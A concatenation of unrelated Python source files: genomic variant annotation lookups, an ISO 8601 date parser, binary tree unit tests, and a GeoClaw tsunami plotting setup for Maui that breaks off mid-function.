def get_dbsnp_info(var):
"""
Returns a suite of annotations from dbSNP
"""
rs_ids = []
for hit in annotations_in_vcf(var, "dbsnp", "vcf", "grch37"):
rs_ids.append(hit.id)
return ",".join(rs_ids) if len(rs_ids) > 0 else None
def get_esp_info(var):
"""
Returns a suite of annotations from the ESP project
ESP reports the minor allele frequency (MAF), not the
alternate allele frequency (AAF). We must therefore figure
    out whether the reference or alternate allele is the minor allele.
1 69496 rs150690004 G A . PASS DBSNP=dbSNP_134;EA_AC=2,6764;AA_AC=23,3785;TAC=25,10549;MAF=0.0296,0.604,0.2364;GTS=AA,AG,GG;EA_GTC=0,2,3381;AA_GTC=5,13,1886;GTC=5,15,5267;DP=91;GL=OR4F5;CP=0.5;CG=2.3;AA=G;CA=.;EXOME_CHIP=no;GWAS_PUBMED=.;GM=NM_001005484.1;FG=missense;AAC=SER/GLY;PP=136/306;CDP=406;GS=56;PH=benign
1 69511 rs75062661 A G . PASS DBSNP=dbSNP_131;EA_AC=5337,677;AA_AC=1937,1623;TAC=7274,2300;MAF=11.2571,45.5899,24.0234;GTS=GG,GA,AA;EA_GTC=2430,477,100;AA_GTC=784,369,627;GTC=3214,846,727;DP=69;GL=OR4F5;CP=1.0;CG=1.1;AA=G;CA=.;EXOME_CHIP=no;GWAS_PUBMED=.;GM=NM_001005484.1;FG=missense;AAC=ALA/THR;PP=141/306;CDP=421;GS=58;PH=benign
"""
fetched = []
exome_chip = False
found = False
info_map = {}
acs = {}
for hit in annotations_in_vcf(var, "esp", "vcf", "grch37"):
if hit.contig not in ['Y']:
fetched.append(hit)
# We need a single ESP entry for a variant
if fetched != None and len(fetched) == 1 and \
hit.alt == var.ALT[0] and hit.ref == var.REF:
found = True
# loads each VCF INFO key/value pair into a DICT
for info in hit.info.split(";"):
if info.find("=") > 0:
                        # splits on the first occurrence of '='
                        # avoids "ValueError: too many values to unpack" when the value itself contains '=', e.g. for cases like
# SA=http://www.ncbi.nlm.nih.gov/sites/varvu?gene=4524&%3Brs=1801131|http://omim.org/entry/607093#0004
(key, value) = info.split("=", 1)
info_map[key] = value
                # NOTE: if we start to use GTS, need to update preprocessing
# script to handle weirdness on X, Y
# get the allele counts so that we can compute alternate allele frequencies
# example: EA_AC=2,6764;AA_AC=23,3785;TAC=25,10549
for key in ('EA_AC', 'AA_AC', 'TAC'):
if info_map.get(key) is not None:
lines = info_map[key].split(",")
denom = float(lines[0]) + float(lines[1])
if denom == 0:
acs[key] = 0
else:
# alt allele is stored as 2nd.
acs[key] = float(lines[1]) / denom
                # Is the SNP on a human exome chip?
if info_map.get('EXOME_CHIP') is not None and \
info_map['EXOME_CHIP'] == "no":
exome_chip = 0
elif info_map.get('EXOME_CHIP') is not None and \
info_map['EXOME_CHIP'] == "yes":
exome_chip = 1
break
return ESPInfo(found, acs.get('EA_AC'), acs.get("AA_AC"), acs.get("TAC"), exome_chip)
EMPTY_1000G = ThousandGInfo(False, None, None, None, None, None, None)
def get_1000G_info(var, empty=EMPTY_1000G):
"""
Returns a suite of annotations from the 1000 Genomes project
"""
#fetched = []
info_map = {}
for hit in annotations_in_vcf(var, "1000g", "vcf", "grch37"):
# We need to ensure we are dealing with the exact sample variant
# based on position and the alleles present.
# var.start is used since the chromosomal pos in pysam.asVCF is zero based (hit.pos)
# and would be equivalent to (POS-1) i.e. var.start
if var.start == hit.pos and \
var.ALT[0] == hit.alt and \
hit.ref == var.REF:
for info in hit.info.split(";"):
if "=" in info:
(key, value) = info.split("=", 1)
info_map[key] = value
return ThousandGInfo(True, info_map.get('AF'), info_map.get('AMR_AF'),
info_map.get('EAS_AF'), info_map.get('SAS_AF'),
info_map.get('AFR_AF'), info_map.get('EUR_AF'))
return empty
EXAC_EMTPY = ExacInfo(False, None, None, None, None, None,
None, None, None, None)
def get_exac_info(var, empty=EXAC_EMTPY):
"""
Returns the allele frequencies from the Exac data (Broad)
"""
info_map = {}
afs = {}
for hit in annotations_in_vcf(var,"exac", "vcf", "grch37"):
# Does not handle anything beyond var.ALT[0] in the VCF (in case of multi-allelic variants)
# var.start is used since the chromosomal pos in pysam.asVCF is zero based (hit.pos)
# and would be equivalent to (POS-1) i.e var.start
if not (var.start == hit.pos and var.REF == hit.ref):
continue
# This would look for var.ALT[0] matches to
# any of the multiple alt alleles represented in the EXAC file
ALT = hit.alt.split(",")
for allele_num, each in enumerate(ALT):
if each != var.ALT[0]:
continue
# Store the allele index of the match to retrieve the right frequencies
for info in hit.info.split(";"):
if "=" in info:
(key, value) = info.split("=", 1)
info_map[key] = value
# Population independent raw (non-adjusted) allele frequencies given by AF
if info_map.get('AF') is not None:
aaf_ALL = info_map['AF'].split(",")[allele_num]
else:
aaf_ALL = None
for grp in ('Adj', 'AFR', 'AMR', 'EAS', 'FIN', 'NFE', 'OTH', 'SAS'):
ac = info_map.get('AC_%s' % grp)
if ac is None: continue
an = info_map.get('AN_%s' % grp)
if an is None: continue
if an == '0':
afs[grp] = 0
continue
ac_list = ac.split(",")
afs[grp] = float(ac_list[allele_num]) / float(an)
return ExacInfo(True, aaf_ALL, afs['Adj'], afs['AFR'], afs['AMR'],
afs['EAS'], afs['FIN'], afs['NFE'], afs['OTH'], afs['SAS'])
return empty
def get_rmsk_info(var):
"""
Returns a comma-separated list of annotated repeats
that overlap a variant. Derived from the UCSC rmsk track
"""
rmsk_hits = []
for hit in annotations_in_region(var, "rmsk", "bed"):
rmsk_hits.append(hit.name)
return ",".join(rmsk_hits) if len(rmsk_hits) > 0 else None
def get_segdup_info(var):
"""
Returns a boolean indicating whether or not the
variant overlaps a known segmental duplication.
"""
for hit in annotations_in_region(var, "segdup", "bed"):
return True
return False
def get_conservation_info(var):
"""
Returns a boolean indicating whether or not the
variant overlaps a conserved region as defined
by the 29-way mammalian conservation study.
http://www.nature.com/nature/journal/v478/n7370/full/nature10530.html
Data file provenance:
http://www.broadinstitute.org/ftp/pub/assemblies/mammals/29mammals/ \
29way_pi_lods_elements_12mers.chr_specific.fdr_0.1_with_scores.txt.gz
# Script to convert for gemini:
gemini/annotation_provenance/make-29way-conservation.sh
"""
for hit in annotations_in_region(var, "conserved", "bed"):
return True
return False
def get_recomb_info(var):
"""
Returns the mean recombination rate at the site.
"""
count = 0
tot_rate = 0.0
for hit in annotations_in_region(var, "recomb", "bed"):
if hit.contig not in ['chrY']:
# recomb rate file is in bedgraph format.
# pysam will store the rate in the "name" field
count += 1
tot_rate += float(hit.name)
return float(tot_rate) / float(count) if count > 0 else None
def _get_first_vcf_hit(hit_iter):
if hit_iter is not None:
hits = list(hit_iter)
if len(hits) > 0:
return hits[0]
def _get_vcf_info_attrs(hit):
info_map = {}
for info in hit.info.split(";"):
if info.find("=") > 0:
(key, value) = info.split("=", 1)
info_map[key] = value
return info_map
def get_gms(var):
"""Return Genome Mappability Scores for multiple technologies.
"""
techs = ["illumina", "solid", "iontorrent"]
hit = _get_first_vcf_hit(
annotations_in_vcf(var, "gms", "vcf", "grch37"))
attr_map = _get_vcf_info_attrs(hit) if hit is not None else {}
    return GmsTechs(
        *[attr_map.get("GMS_{0}".format(x), None) for x in techs])
def get_grc(var):
"""Return GRC patched genome regions.
"""
regions = set()
for hit in annotations_in_region(var, "grc", "bed", "grch37"):
regions.add(hit.name)
return ",".join(sorted(list(regions))) if len(regions) > 0 else None
def get_cse(var):
"""Return if a variant is in a CSE: Context-specific error region.
"""
for hit in annotations_in_region(var, "cse", "bed", "grch37"):
return True
return False
def get_encode_tfbs(var):
"""
Returns a comma-separated list of transcription factors that were
observed to bind DNA in this region. Each hit in the list is constructed
as TF_CELLCOUNT, where:
TF is the transcription factor name
CELLCOUNT is the number of cells tested that had nonzero signals
NOTE: the annotation file is in BED format, but pysam doesn't
tolerate BED files with more than 12 fields, so we just use the base
tuple parser and grab the name column (4th column)
"""
tfbs = []
for hit in annotations_in_region(var, "encode_tfbs", "tuple"):
tfbs.append(hit[3] + "_" + hit[4])
if len(tfbs) > 0:
return ','.join(tfbs)
else:
return None
def get_encode_dnase_clusters(var):
"""
If a variant overlaps a DnaseI cluster, return the number of cell types
that were found to have DnaseI HS at in the given interval, as well
as a comma-separated list of each cell type:
Example data:
chr1 20042385 20042535 4 50.330600 8988t;K562;Osteobl;hTH1
chr1 20043060 20043210 3 12.450500 Gm12891;T47d;hESCT0
chr1 20043725 20043875 2 5.948180 Fibrobl;Fibrop
chr1 20044125 20044275 3 6.437350 HESC;Ips;hTH1
"""
for hit in annotations_in_region(var, "encode_dnase1", "tuple"):
return ENCODEDnaseIClusters(hit[3], hit[5])
return ENCODEDnaseIClusters(None, None)
def get_encode_consensus_segs(var):
"""
Queries a meta-BEDGRAPH of consensus ENCODE segmentations for 6 cell types:
gm12878, h1hesc, helas3, hepg2, huvec, k562
Returns a 6-tuple of the predicted chromatin state of each cell type for the
region overlapping the variant.
CTCF: CTCF-enriched element
E: Predicted enhancer
PF: Predicted promoter flanking region
R: Predicted repressed or low-activity region
TSS: Predicted promoter region including TSS
T: Predicted transcribed region
WE: Predicted weak enhancer or open chromatin cis-regulatory element
"""
for hit in annotations_in_region(var, "encode_consensus_segs", "tuple"):
return ENCODESegInfo(hit[3], hit[4], hit[5], hit[6], hit[7], hit[8])
return ENCODESegInfo(None, None, None, None, None, None)
def get_encode_segway_segs(var):
"""
Queries a meta-BEDGRAPH of SegWay ENCODE segmentations for 6 cell types:
gm12878, h1hesc, helas3, hepg2, huvec, k562
Returns a 6-tuple of the predicted chromatin state of each cell type for the
region overlapping the variant.
"""
for hit in annotations_in_region(var, "encode_segway_segs", "tuple"):
return ENCODESegInfo(hit[3], hit[4], hit[5], hit[6], hit[7], hit[8])
return ENCODESegInfo(None, None, None, None, None, None)
def get_encode_chromhmm_segs(var):
"""
Queries a meta-BEDGRAPH of SegWay ENCODE segmentations for 6 cell types:
gm12878, h1hesc, helas3, hepg2, huvec, k562
Returns a 6-tuple of the predicted chromatin state of each cell type for the
region overlapping the variant.
"""
for hit in annotations_in_region(var, "encode_chromhmm_segs", "tuple"):
return ENCODESegInfo(hit[3], hit[4], hit[5], hit[6], hit[7], hit[8])
return ENCODESegInfo(None, None, None, None, None, None)
def get_resources( args ):
"""Retrieve list of annotation resources loaded into gemini.
"""
anno_files = get_anno_files( args )
return [(n, os.path.basename(anno_files[n])) for n in sorted(anno_files.keys())]
|
|
##############################################################################
# Copyright 2009, Gerhard Weis
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the authors nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT
##############################################################################
'''
This module provides a method to parse an ISO 8601:2004 date string into a
python datetime.date instance.
It supports all basic, extended and expanded formats as described in the ISO
standard. The only limitations are those of the Python datetime.date
implementation, which does not support dates before 0001-01-01.
'''
import re
from datetime import date, timedelta
from isodate.isostrf import strftime, DATE_EXT_COMPLETE
from isodate.isoerror import ISO8601Error
DATE_REGEX_CACHE = {}
# A dictionary to cache pre-compiled regular expressions.
# Each set of regular expressions is identified by the number of year digits
# allowed and by whether a plus/minus sign is required or not. (This option is
# changeable only for 4-digit years.)
def build_date_regexps(yeardigits=4, expanded=False):
'''
    Compile a set of regular expressions to parse ISO dates. The expressions
    will be created only if they are not already in DATE_REGEX_CACHE.
It is necessary to fix the number of year digits, else it is not possible
to automatically distinguish between various ISO date formats.
ISO 8601 allows more than 4 digit years, on prior agreement, but then a +/-
sign is required (expanded format). To support +/- sign for 4 digit years,
the expanded parameter needs to be set to True.
'''
if yeardigits != 4:
expanded = True
if (yeardigits, expanded) not in DATE_REGEX_CACHE:
cache_entry = []
# ISO 8601 expanded DATE formats allow an arbitrary number of year
# digits with a leading +/- sign.
if expanded:
sign = 1
else:
sign = 0
# 1. complete dates:
# YYYY-MM-DD or +- YYYYYY-MM-DD... extended date format
cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
r"-(?P<month>[0-9]{2})-(?P<day>[0-9]{2})"
% (sign, yeardigits)))
# YYYYMMDD or +- YYYYYYMMDD... basic date format
cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
r"(?P<month>[0-9]{2})(?P<day>[0-9]{2})"
% (sign, yeardigits)))
# 2. complete week dates:
# YYYY-Www-D or +-YYYYYY-Www-D ... extended week date
cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
r"-W(?P<week>[0-9]{2})-(?P<day>[0-9]{1})"
% (sign, yeardigits)))
# YYYYWwwD or +-YYYYYYWwwD ... basic week date
cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})W"
r"(?P<week>[0-9]{2})(?P<day>[0-9]{1})"
% (sign, yeardigits)))
# 3. ordinal dates:
# YYYY-DDD or +-YYYYYY-DDD ... extended format
cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
r"-(?P<day>[0-9]{3})"
% (sign, yeardigits)))
# YYYYDDD or +-YYYYYYDDD ... basic format
cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
r"(?P<day>[0-9]{3})"
% (sign, yeardigits)))
# 4. week dates:
# YYYY-Www or +-YYYYYY-Www ... extended reduced accuracy week date
cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
r"-W(?P<week>[0-9]{2})"
% (sign, yeardigits)))
# YYYYWww or +-YYYYYYWww ... basic reduced accuracy week date
cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})W"
r"(?P<week>[0-9]{2})"
% (sign, yeardigits)))
# 5. month dates:
        #    YYYY-MM or +-YYYYYY-MM ... reduced accuracy specific month
cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
r"-(?P<month>[0-9]{2})"
% (sign, yeardigits)))
# 6. year dates:
# YYYY or +-YYYYYY ... reduced accuracy specific year
cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}(?P<year>[0-9]{%d})"
% (sign, yeardigits)))
# 7. century dates:
# YY or +-YYYY ... reduced accuracy specific century
cache_entry.append(re.compile(r"(?P<sign>[+-]){%d}"
r"(?P<century>[0-9]{%d})"
% (sign, yeardigits - 2)))
DATE_REGEX_CACHE[(yeardigits, expanded)] = cache_entry
return DATE_REGEX_CACHE[(yeardigits, expanded)]
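# Illustrative note (not part of the original module): the cache above means
# repeated calls with the same (yeardigits, expanded) pair hand back the very
# same list object, and any yeardigits other than 4 silently forces
# expanded=True.
def _regex_cache_examples():  # pragma: no cover
    assert build_date_regexps(4) is build_date_regexps(4)
    assert build_date_regexps(6) is build_date_regexps(6, expanded=True)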
def parse_date(datestring, yeardigits=4, expanded=False):
'''
Parse an ISO 8601 date string into a datetime.date object.
As the datetime.date implementation is limited to dates starting from
0001-01-01, negative dates (BC) and year 0 can not be parsed by this
method.
    For incomplete dates, this method chooses the first possible day. For
    instance, if only a century is given, this method returns the 1st of
    January of year 1 of that century.
supported formats: (expanded formats are shown with 6 digits for year)
YYYYMMDD +-YYYYYYMMDD basic complete date
YYYY-MM-DD +-YYYYYY-MM-DD extended complete date
YYYYWwwD +-YYYYYYWwwD basic complete week date
YYYY-Www-D +-YYYYYY-Www-D extended complete week date
YYYYDDD +-YYYYYYDDD basic ordinal date
YYYY-DDD +-YYYYYY-DDD extended ordinal date
YYYYWww +-YYYYYYWww basic incomplete week date
YYYY-Www +-YYYYYY-Www extended incomplete week date
    YYYY-MM      +-YYYYYY-MM        incomplete month date
YYYY +-YYYYYY incomplete year date
YY +-YYYY incomplete century date
@param datestring: the ISO date string to parse
@param yeardigits: how many digits are used to represent a year
@param expanded: if True then +/- signs are allowed. This parameter
is forced to True, if yeardigits != 4
@return: a datetime.date instance represented by datestring
@raise ISO8601Error: if this function can not parse the datestring
@raise ValueError: if datestring can not be represented by datetime.date
'''
if yeardigits != 4:
expanded = True
isodates = build_date_regexps(yeardigits, expanded)
for pattern in isodates:
match = pattern.match(datestring)
if match:
groups = match.groupdict()
# sign, century, year, month, week, day,
# FIXME: negative dates not possible with python standard types
sign = (groups['sign'] == '-' and -1) or 1
if 'century' in groups:
return date(sign * (int(groups['century']) * 100 + 1), 1, 1)
if 'month' not in groups: # weekdate or ordinal date
ret = date(sign * int(groups['year']), 1, 1)
if 'week' in groups:
isotuple = ret.isocalendar()
if 'day' in groups:
days = int(groups['day'] or 1)
else:
days = 1
# if first week in year, do weeks-1
return ret + timedelta(weeks=int(groups['week']) -
(((isotuple[1] == 1) and 1) or 0),
days=-isotuple[2] + days)
elif 'day' in groups: # ordinal date
return ret + timedelta(days=int(groups['day'])-1)
else: # year date
return ret
# year-, month-, or complete date
if 'day' not in groups or groups['day'] is None:
day = 1
else:
day = int(groups['day'])
return date(sign * int(groups['year']),
int(groups['month']) or 1, day)
raise ISO8601Error('Unrecognised ISO 8601 date format: %r' % datestring)
def date_isoformat(tdate, format=DATE_EXT_COMPLETE, yeardigits=4):
'''
Format date strings.
This method is just a wrapper around isodate.isostrf.strftime and uses
Date-Extended-Complete as default format.
'''
return strftime(tdate, format, yeardigits)
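# Illustrative sketch (not part of the original module): a few parse_date
# round-trips, following the format table in its docstring. Every date in the
# first group denotes the same calendar day.
def _parse_date_examples():  # pragma: no cover
    assert parse_date('19850412') == date(1985, 4, 12)    # basic complete date
    assert parse_date('1985-04-12') == date(1985, 4, 12)  # extended complete date
    assert parse_date('1985-W15-5') == date(1985, 4, 12)  # extended week date
    assert parse_date('1985-102') == date(1985, 4, 12)    # extended ordinal date
    # Expanded format: more than 4 year digits requires a leading sign.
    assert parse_date('+0019850412', yeardigits=6) == date(1985, 4, 12)
    # Reduced accuracy dates resolve to the first day they could denote.
    assert parse_date('1985-04') == date(1985, 4, 1)      # month date
    assert parse_date('1985') == date(1985, 1, 1)         # year date
    assert parse_date('19') == date(1901, 1, 1)           # century date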
|
|
import unittest
from unittest import TestCase
from algorithms.dataStructures.BinaryTree import BinaryTreeNode
from algorithms.dataStructures.BinaryTree import BinaryTree
class binary_tree_creation_Test(TestCase):
def test_create_node(self):
n = BinaryTreeNode(1)
self.assertIsInstance(n, BinaryTreeNode)
def test_create_node_assigns_correct_data(self):
n = BinaryTreeNode(1)
self.assertEqual(1, n.value)
def test_create_node_assigns_None_to_left_right_parent(self):
n = BinaryTreeNode(1)
self.assertIsNone(n.left)
self.assertIsNone(n.right)
self.assertIsNone(n.parent)
def test_create_binary_tree(self):
bt = BinaryTree()
self.assertIsInstance(bt, BinaryTree)
def test_create_binary_tree_with_one_node(self):
n = BinaryTreeNode(1)
bt = BinaryTree(n)
self.assertEqual(n, bt.root)
self.assertEqual(1, bt.root.value)
self.assertIsNone(bt.root.parent)
    def test_create_binary_tree_with_multiple_nodes(self):
nr = BinaryTreeNode(3)
nl = BinaryTreeNode(2)
n = BinaryTreeNode(1, nl, nr)
bt = BinaryTree(n)
self.assertEqual(n, bt.root)
self.assertEqual(1, bt.root.value)
self.assertEqual(nl, bt.root.left)
self.assertEqual(2, bt.root.left.value)
self.assertEqual(nr, bt.root.right)
self.assertEqual(3, bt.root.right.value)
class empty_Test(TestCase):
def test_empty_Tree(self):
bt = BinaryTree()
self.assertTrue(bt.is_empty())
def test_one_element_Tree(self):
bt = BinaryTree(BinaryTreeNode(1))
self.assertFalse(bt.is_empty())
class transversal_Test(TestCase):
def setUp(self):
nrr = BinaryTreeNode(7)
nrl = BinaryTreeNode(6)
nlr = BinaryTreeNode(5)
nll = BinaryTreeNode(4)
nr = BinaryTreeNode(3, nrl, nrr)
nl = BinaryTreeNode(2, nll, nlr)
n = BinaryTreeNode(1, nl, nr)
self.bt = BinaryTree(n)
def test_level_order(self):
output = ''
def fcn(node):
nonlocal output
output += str(node.value) + ' '
self.bt.root.transverse(fcn)
self.assertEqual("1 2 3 4 5 6 7 ", output)
def test_inorder(self):
output = ''
def fcn(node):
nonlocal output
output += str(node.value) + ' '
self.bt.root.transverse_inorder(fcn)
self.assertEqual("4 2 5 1 6 3 7 ", output)
def test_preorder(self):
output = ''
def fcn(value):
nonlocal output
output += str(value) + ' '
self.bt.root.transverse_preorder(fcn)
self.assertEqual("1 2 4 5 3 6 7 ", output)
def test_postorder(self):
import sys
from io import StringIO
saved_stdout = sys.stdout
try:
out = StringIO()
sys.stdout = out
self.bt.root.transverse_postorder(print)
output = out.getvalue().strip()
self.assertEqual(output, "4\n5\n2\n6\n7\n3\n1")
finally:
sys.stdout = saved_stdout
class contains_Test(TestCase):
def setUp(self):
nrr = BinaryTreeNode(7)
nrl = BinaryTreeNode(6)
nlr = BinaryTreeNode(5)
nll = BinaryTreeNode(4)
nr = BinaryTreeNode(3, nrl, nrr)
nl = BinaryTreeNode(2, nll, nlr)
n = BinaryTreeNode(1, nl, nr)
self.bt = BinaryTree(n)
def test_contains(self):
self.assertTrue(self.bt.contains(1))
self.assertTrue(self.bt.contains(2))
self.assertTrue(self.bt.contains(3))
self.assertTrue(self.bt.contains(4))
self.assertTrue(self.bt.contains(5))
self.assertTrue(self.bt.contains(6))
self.assertTrue(self.bt.contains(7))
def test_does_not_contain(self):
self.assertFalse(self.bt.contains(8))
self.assertFalse(self.bt.contains(0))
self.assertFalse(self.bt.contains('a'))
self.assertFalse(self.bt.contains(45))
self.assertFalse(self.bt.contains((1, 2)))
self.assertFalse(self.bt.contains("tree"))
class insert_Test(TestCase):
def test_insert_empty_tree(self):
bt = BinaryTree()
bt.insert(1)
self.assertEqual(1, bt.root.value)
def test_insert_just_root_node(self):
n = BinaryTreeNode(1)
bt = BinaryTree(n)
bt.insert(2)
self.assertEqual(2, bt.root.left.value)
def test_insert_root_and_left_node(self):
nl = BinaryTreeNode(2)
n = BinaryTreeNode(1, nl)
bt = BinaryTree(n)
bt.insert(3)
self.assertEqual(3, bt.root.right.value)
def test_insert_root_and_right_node(self):
nr = BinaryTreeNode(2)
n = BinaryTreeNode(1, None, nr)
bt = BinaryTree(n)
bt.insert(3)
self.assertEqual(3, bt.root.left.value)
def test_insert_root_left_and_right_node(self):
nr = BinaryTreeNode(3)
nl = BinaryTreeNode(2)
n = BinaryTreeNode(1, nl, nr)
bt = BinaryTree(n)
bt.insert(4)
self.assertEqual(4, bt.root.left.left.value)
def test_insert_root_two_left_nodes(self):
nll = BinaryTreeNode(3)
nl = BinaryTreeNode(2, nll)
n = BinaryTreeNode(1, nl)
bt = BinaryTree(n)
bt.insert(4)
self.assertEqual(4, bt.root.right.value)
def test_insert_root_two_right_nodes(self):
nrr = BinaryTreeNode(3)
nr = BinaryTreeNode(2, None, nrr)
n = BinaryTreeNode(1, None, nr)
bt = BinaryTree(n)
bt.insert(4)
self.assertEqual(4, bt.root.left.value)
if __name__ == '__main__':
unittest.main()
|
|
"""
Set up the plot figures, axes, and items to be done for each frame.
This module is imported by the plotting routines and then the
function setplot is called to set the plot parameters.
"""
#--------------------------
def setplot(plotdata):
#--------------------------
"""
Specify what is to be plotted at each frame.
Input: plotdata, an instance of clawpack.visclaw.data.ClawPlotData.
Output: a modified version of plotdata.
"""
from clawpack.visclaw import colormaps, geoplot
from numpy import linspace
plotdata.clearfigures() # clear any old figures,axes,items data
    # To plot gauge locations on pcolor or contour plot, use this as
    # an afteraxes function:
def addgauges(current_data):
from clawpack.visclaw import gaugetools
gaugetools.plot_gauge_locations(current_data.plotdata, \
gaugenos='all', format_string='ko', add_labels=False)
def fixup(current_data):
import pylab
addgauges(current_data)
t = current_data.t
t = t / 3600. # hours
pylab.title('Surface at %4.2f hours' % t, fontsize=20)
#pylab.xticks(fontsize=15)
#pylab.yticks(fontsize=15)
#-----------------------------------------
# Figure for imshow plot
#-----------------------------------------
plotfigure = plotdata.new_plotfigure(name='Domain', figno=1)
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes('imshow')
plotaxes.title = 'Surface'
plotaxes.scaled = True
plotaxes.afteraxes = fixup
# Water
plotitem = plotaxes.new_plotitem(plot_type='2d_imshow')
# plotitem.plot_var = geoplot.surface
plotitem.plot_var = geoplot.surface_or_depth
plotitem.imshow_cmap = geoplot.tsunami_colormap
plotitem.imshow_cmin = -0.5
plotitem.imshow_cmax = 0.5
plotitem.add_colorbar = True
plotitem.amr_celledges_show = [0,0,0]
plotitem.patchedges_show = 0
#plotitem.amr_patchedges_show = [1,1,1,0,0] # only coarse levels
# Land
plotitem = plotaxes.new_plotitem(plot_type='2d_imshow')
plotitem.plot_var = geoplot.land
plotitem.imshow_cmap = geoplot.land_colors
plotitem.imshow_cmin = 0.0
plotitem.imshow_cmax = 100.0
plotitem.add_colorbar = False
plotitem.amr_celledges_show = [0,0,0]
plotitem.patchedges_show = 0
#plotitem.amr_patchedges_show = [1,1,1,0,0] # only coarse levels
plotaxes.xlimits = 'auto'
plotaxes.ylimits = 'auto'
# add contour lines of bathy if desired:
plotitem = plotaxes.new_plotitem(plot_type='2d_contour')
plotitem.show = False
plotitem.plot_var = geoplot.topo
plotitem.contour_levels = linspace(-2000,0,5)
plotitem.amr_contour_colors = ['y'] # color on each level
plotitem.kwargs = {'linestyles':'solid','linewidths':2}
plotitem.amr_contour_show = [1,0,0]
plotitem.celledges_show = 0
plotitem.patchedges_show = 0
#-----------------------------------------
# Figure for zoom plot
#-----------------------------------------
plotfigure = plotdata.new_plotfigure(name='Maui', figno=2)
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes('imshow')
plotaxes.title = 'Surface'
plotaxes.scaled = True
plotaxes.afteraxes = fixup
# Water
plotitem = plotaxes.new_plotitem(plot_type='2d_imshow')
# plotitem.plot_var = geoplot.surface
plotitem.plot_var = geoplot.surface_or_depth
plotitem.imshow_cmap = geoplot.tsunami_colormap
plotitem.imshow_cmin = -1.
plotitem.imshow_cmax = 1.
plotitem.add_colorbar = True
plotitem.amr_celledges_show = [0,0,0]
plotitem.patchedges_show = 0
# Land
plotitem = plotaxes.new_plotitem(plot_type='2d_imshow')
plotitem.plot_var = geoplot.land
plotitem.imshow_cmap = geoplot.land_colors
plotitem.imshow_cmin = 0.0
plotitem.imshow_cmax = 100.0
plotitem.add_colorbar = False
plotitem.amr_celledges_show = [0,0,0]
plotitem.patchedges_show = 0
plotaxes.xlimits = [203.2, 204.1]
plotaxes.ylimits = [20.4, 21.3]
# add contour lines of bathy if desired:
plotitem = plotaxes.new_plotitem(plot_type='2d_contour')
plotitem.show = False
plotitem.plot_var = geoplot.topo
plotitem.contour_levels = linspace(-2000,0,5)
plotitem.amr_contour_colors = ['y'] # color on each level
plotitem.kwargs = {'linestyles':'solid','linewidths':2}
plotitem.amr_contour_show = [1,0,0]
plotitem.celledges_show = 0
plotitem.patchedges_show = 0
#-----------------------------------------
# Figure for zoom plot
#-----------------------------------------
plotfigure = plotdata.new_plotfigure(name='Kahului Harbor', figno=3)
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes('imshow')
plotaxes.title = 'Surface'
plotaxes.scaled = True
plotaxes.afteraxes = fixup
# Water
plotitem = plotaxes.new_plotitem(plot_type='2d_imshow')
# plotitem.plot_var = geoplot.surface
plotitem.plot_var = geoplot.surface_or_depth
plotitem.imshow_cmap = geoplot.tsunami_colormap
plotitem.imshow_cmin = -0.2
plotitem.imshow_cmax = 0.2
plotitem.add_colorbar = True
plotitem.celledges_show = 0
plotitem.patchedges_show = 0
# Land
plotitem = plotaxes.new_plotitem(plot_type='2d_imshow')
plotitem.plot_var = geoplot.land
plotitem.imshow_cmap = geoplot.land_colors
plotitem.imshow_cmin = 0.0
plotitem.imshow_cmax = 10.0
plotitem.add_colorbar = False
plotitem.celledges_show = 0
plotitem.patchedges_show = 0
plotaxes.xlimits = [203.48, 203.57]
plotaxes.ylimits = [20.88, 20.94]
# add contour lines of bathy if desired:
plotitem = plotaxes.new_plotitem(plot_type='2d_contour')
plotitem.show = False
plotitem.plot_var = geoplot.topo
#plotitem.contour_levels = linspace(-2000,0,5)
plotitem.contour_levels = linspace(0,8,9)
plotitem.amr_contour_colors = ['y'] # color on each level
plotitem.kwargs = {'linestyles':'solid','linewidths':2}
plotitem.amr_contour_show = [0,0,0,0,0,1]
plotitem.celledges_show = 0
plotitem.patchedges_show = 0
#-----------------------------------------
# Figures for gauges
#-----------------------------------------
plotfigure = plotdata.new_plotfigure(name='Surface', figno=300, \
type='each_gauge')
plotfigure.clf_each_gauge = True
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes()
#plotaxes.axescmd = 'subplot(2,1,1)'
plotaxes.title = 'Surface'
# Plot surface as blue curve:
plotitem = plotaxes.new_plotitem(plot_type='1d_plot')
plotitem.plot_var = 3
